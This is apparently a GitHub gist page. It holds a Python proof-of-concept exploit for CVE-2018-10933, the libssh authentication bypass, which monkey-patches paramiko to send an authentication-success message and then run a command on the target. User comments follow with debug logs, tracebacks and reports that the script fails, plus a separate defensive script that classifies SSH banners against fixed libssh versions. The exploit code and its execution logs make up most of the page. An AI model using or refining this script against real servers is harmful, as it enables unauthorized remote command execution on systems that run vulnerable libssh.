#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging

username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]

new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
    paramiko.common.MSG_USERAUTH_SUCCESS]

def auth_accept(*args, **kwargs):
    return new_auth_accept(*args, **kwargs)

paramiko.auth_handler.AuthHandler._handler_table.update({
    paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
})

port = 22

try:
    logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.WarningPolicy)
    client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
    stdin, stdout, stderr = client.exec_command(command)
    print stdout.read(),
finally:
    client.close()
exec_command does not work:
DEBUG:paramiko.transport:Authentication type (publickey) not permitted.
DEBUG:paramiko.transport:Allowed methods: [u'password']
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) successful!
DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
DEBUG:paramiko.transport:[chan 0] Max packet out: 35000 bytes
DEBUG:paramiko.transport:Secsh channel 0 opened.
DEBUG:paramiko.transport:[chan 0] EOF sent (0)
DEBUG:paramiko.transport:EOF in transport thread
Traceback (most recent call last):
  File "test.py", line 28, in <module>
    stdin, stdout, stderr = client.exec_command(command)
  File "C:\Python27\lib\site-packages\paramiko\client.py", line 429, in exec_command
    chan.exec_command(command)
  File "C:\Python27\lib\site-packages\paramiko\channel.py", line 62, in _check
    return func(self, *args, **kwds)
  File "C:\Python27\lib\site-packages\paramiko\channel.py", line 240, in exec_command
    self._wait_for_event()
  File "C:\Python27\lib\site-packages\paramiko\channel.py", line 1143, in _wait_for_event
    raise e
paramiko.ssh_exception.SSHException: Channel closed.
As another user pointed out, you must change:
client.set_missing_host_key_policy(paramiko.WarningPolicy)
for
client.set_missing_host_key_policy(paramiko.WarningPolicy())
I've tested the script on a known vulnerable server and it does return a
paramiko.ssh_exception.AuthenticationException: Authentication failed.
error. Definitively a false negative here. I would love to see a working exploit targeting a production-use server implementation. According to my experiments, the exploitation is heavily dependent on the server's logic, but I can be wrong.
I checked my server and found libssh version 0.6.3-4.3. I ran your code, but it always raises paramiko.ssh_exception.AuthenticationException: Authentication failed.
from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
apparently OpenSSH does not rely on libssh
OpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.
anyone can confirm this?
Yes, libssh is an implementation of the SSH protocol as a server library, and OpenSSH is another implementation.
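The libssh/OpenSSH distinction discussed in the comments above, as an added defender-side triage example that is not part of the gist or any commenter's code: it classifies SSH identification strings and compares libssh versions against the upstream fixed releases for CVE-2018-10933 (0.7.6 and 0.8.4). The function name, verdict labels and sample banners are assumptions made for this illustration.

```python
import re

# Fixed upstream releases for CVE-2018-10933 (libssh 0.6 and later are affected).
FIXED = {(0, 7): (0, 7, 6), (0, 8): (0, 8, 4)}
FIRST_AFFECTED = (0, 6, 0)

BANNER_RE = re.compile(r"^SSH-[\d.]+-(?P<software>\S+)")
LIBSSH_RE = re.compile(r"^libssh[-_](\d+)\.(\d+)\.(\d+)")


def classify_banner(banner):
    """Return (implementation, verdict) for one SSH identification string."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return ("unknown", "not-an-ssh-banner")
    software = m.group("software")
    if software.startswith("OpenSSH"):
        return ("openssh", "not-affected")  # separate code base, no libssh
    if software.startswith("libssh2"):
        return ("libssh2", "not-affected")  # unrelated client-only library
    if not software.startswith("libssh"):
        return ("other", "not-libssh")
    v = LIBSSH_RE.match(software)
    if not v:
        return ("libssh", "version-unknown")
    version = tuple(int(x) for x in v.groups())
    if version < FIRST_AFFECTED:
        return ("libssh", "not-affected")
    fixed = FIXED.get(version[:2])
    if fixed is None:
        # 0.6.x has no fixed release in FIXED; 0.9 and later postdate the fix.
        patched = version[:2] > (0, 8)
    else:
        patched = version >= fixed
    # "affected-range" is a lead, not proof: distro packages backport fixes
    # and banners can be customised, so confirm against the package changelog.
    return ("libssh", "fixed-upstream" if patched else "affected-range")


# Constructed sample banners, not taken from the page.
SAMPLES = [
    "SSH-2.0-OpenSSH_7.4",
    "SSH-2.0-libssh-0.6.3",
    "SSH-2.0-libssh_0.7.5",
    "SSH-2.0-libssh_0.8.4",
    "SSH-2.0-libssh2_1.8.0",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, classify_banner(line))
```

A distribution package string such as 0.6.3-4.3 carries a vendor revision, so the upstream comparison alone cannot say whether that build includes a backported fix.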
What is wrong here? I installed python-paramiko.
root@test-VM:/home/test# python3 asd.py
Traceback (most recent call last):
  File "asd.py", line 4, in <module>
    import paramiko
ModuleNotFoundError: No module named 'paramiko'
Hi there, I chanced upon this and am wondering if you could advise whether I need an actual server before I can test this code, or whether I could test it locally, e.g. in Kali via VirtualBox?